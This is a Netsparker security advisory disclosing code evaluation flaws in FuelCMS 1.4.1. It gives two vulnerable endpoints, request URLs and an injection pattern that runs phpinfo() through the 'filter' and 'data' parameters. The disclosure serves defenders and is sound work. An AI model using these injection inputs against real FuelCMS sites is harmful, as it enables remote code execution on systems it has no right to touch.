Information
--------------------
Advisory by Netsparker
Name: Code Evaluations in FuelCMS 1.4.1
Affected Software: FuelCMS
Affected Versions: 1.4.1
Homepage: https://www.getfuelcms.com/
Vulnerability: Code Evaluations
Severity: Critical
Status: Not Fixed
CVE-ID: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
CVSS Score (3.0): 8.6
Netsparker Advisory Reference: NS-18-019

Vulnerabilities Tree
--------------------

Code Evaluation

  1. /fuel/pages/select/ (GET = filter)
  2. /fuel/preview (POST = data)

Technical Details
--------------------

Code Evaluation in /fuel/pages/select/ (GET = filter)
URL: http://{domain}/{fuelcms_path}/fuel/pages/select/?nocache=1507880376191&input=&target=&title=&class=&pdfs=&filter=%27%2b phpinfo() %2b%27
Parameter Name: filter
Parameter Type: GET
Attack Pattern: %27%2b phpinfo() %2b%27

Code Evaluation in /fuel/preview (POST = data)
URL: http://{domain}/{fuelcms_path}/fuel/preview?module=pages&field=vars--body
Parameter Name: data
Parameter Type: POST
Attack Pattern: %27%2b phpinfo() %2b%27

Advisory Timeline
--------------------

23rd October 2017 - First Contact
29th November 2018 - Advisory Released

Credits & Authors
--------------------

These issues have been discovered by Omer Citak while testing Netsparker Web Application Security Scanner.

About Netsparker
--------------------

Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine’s unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.